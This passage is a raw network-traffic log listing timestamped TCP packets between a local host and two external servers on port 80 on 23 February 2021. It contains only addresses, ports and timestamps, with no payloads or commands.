Feb 23, 2021 15:30:33.739770889 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.739799023 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.739820957 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.739831924 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:33.739841938 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:33.739887953 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:35.572432041 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:35.628947973 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:35.872076988 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:35.872100115 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:35.872118950 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:35.872134924 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:35.872150898 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:35.872164965 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:35.872169018 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:35.872184992 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:35.872200966 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:35.872201920 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:35.872215986 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:35.872236013 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:35.872236013 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:35.872252941 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:35.872266054 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:35.872268915 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:35.872284889 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:35.872296095 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:35.872302055 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:35.872317076 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:35.872322083 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:35.872328997 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:35.872344971 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:35.872360945 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:35.872363091 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:35.872376919 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:35.872387886 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:35.872390985 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:35.872414112 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:35.872440100 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:30:35.872472048 CET	80	49737	172.67.172.17	192.168.2.4
Feb 23, 2021 15:30:35.916374922 CET	49737	80	192.168.2.4	172.67.172.17
Feb 23, 2021 15:31:12.910432100 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:12.975286007 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:12.975428104 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:12.975899935 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.037962914 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.199505091 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.199541092 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.199558973 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.199575901 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.199593067 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.199609995 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.199625969 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.199645042 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.199656963 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.199670076 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.199672937 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.199687958 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.199719906 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.199763060 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.201031923 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.201061964 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.201170921 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.202538967 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.202562094 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.202697992 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.203975916 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.204006910 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.204061985 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.205378056 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.205431938 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.205527067 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.209686995 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.209707975 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.209774971 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.209796906 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.209810972 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.209858894 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.209861994 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.209955931 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.209961891 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.211221933 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.211240053 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.211319923 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.212667942 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.212688923 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.212770939 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.214147091 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.214317083 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.263493061 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.263537884 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.263658047 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.264156103 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.264178038 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.264257908 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.265616894 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.265642881 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.265712976 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.267043114 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.267066002 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.267155886 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.268518925 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.268544912 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.268610954 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.269979000 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.270006895 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.270133972 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.271393061 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.271418095 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.271483898 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.272839069 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.272865057 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.273282051 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.274307966 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.274333000 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.274388075 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.275753975 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.275782108 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.275948048 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.277199984 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.277219057 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.277297974 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.278666973 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.278687954 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.278768063 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.280086040 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.280107021 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.280183077 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.281548023 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.281570911 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.281641960 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.283031940 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.283051968 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.283153057 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.284496069 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.284518003 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.284605980 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.285917044 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.285937071 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.286007881 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.287396908 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.287419081 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.287512064 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.288820028 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.289555073 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.289577961 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.289644957 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.291016102 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.291042089 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.291126013 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.292459011 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.292491913 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.292560101 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.293900013 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.293935061 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.293982029 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.295336962 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.295371056 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.295469046 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.296818018 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.296852112 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.296905994 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.325675964 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.325706005 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.325774908 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.326333046 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.326354027 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.326428890 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.327748060 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.327773094 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.327876091 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.329166889 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.329193115 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.329262018 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.330619097 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.330643892 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.330717087 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.332036018 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.332055092 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.332135916 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.333427906 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.333451033 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.333517075 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.335202932 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.335236073 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.335285902 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.336318016 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.336354017 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.336410046 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.337904930 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.337939024 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.338030100 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.339215040 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.339250088 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.339281082 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.340723038 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.340758085 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.340831041 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.342144012 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.342170000 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.342248917 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.343801022 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.343837023 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.343884945 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.345067024 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.345093966 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.345141888 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.346513987 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.346539021 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.346579075 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.347904921 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.347929001 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.347973108 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.349421978 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.350639105 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.351521015 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.351546049 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.351615906 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.353107929 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.353132010 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.353204012 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.353686094 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.353708982 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.353751898 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.355915070 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.355941057 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.356056929 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.357433081 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.357455969 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.357548952 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.358057022 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.358078003 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.358144045 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.387907028 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.387938023 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.388118029 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.388310909 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.388344049 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.388439894 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.389178038 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.389202118 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.389287949 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.390088081 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.390113115 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.390186071 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.391221046 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.391256094 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.391314983 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.392601967 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.392637014 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.392755985 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.394728899 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.394771099 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.395308018 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.395375013 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.395404100 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.395967960 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.397674084 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.399616003 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.399658918 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.399732113 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.404558897 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.404582977 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.404599905 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.404617071 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.404638052 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.404654026 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.404699087 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.404727936 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.405951023 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.405972004 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.406064987 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.409017086 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.409051895 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.409164906 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.409496069 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.409522057 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.409564018 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.410690069 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.410717964 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.410761118 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.411149025 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.411217928 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.411254883 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.412029982 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.412050962 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.412183046 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.412491083 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.412516117 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.412575960 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.413376093 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.413424969 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.413487911 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.414268970 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.414299011 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.414382935 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.416440010 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.416490078 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.416574001 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.417426109 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.417450905 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.417511940 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.418008089 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.418034077 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.418092012 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.418127060 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.418153048 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.418176889 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.418766975 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.418792963 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.418837070 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.419558048 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.419589996 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.419626951 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.420540094 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.420567036 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.420584917 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.421912909 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.421936035 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.422066927 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.422647953 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.422673941 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.422738075 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.423418999 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.423448086 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.423485041 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.424463034 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.424547911 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.424556971 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.424865961 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.424931049 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.424933910 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.425774097 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.425815105 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.425844908 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.426673889 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.426697969 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.426774025 CET	49752	80	192.168.2.4	104.21.71.230
Feb 23, 2021 15:31:13.427541971 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.427568913 CET	80	49752	104.21.71.230	192.168.2.4
Feb 23, 2021 15:31:13.427653074 CET	49752	80	192.168.2.4	104.21.71.230
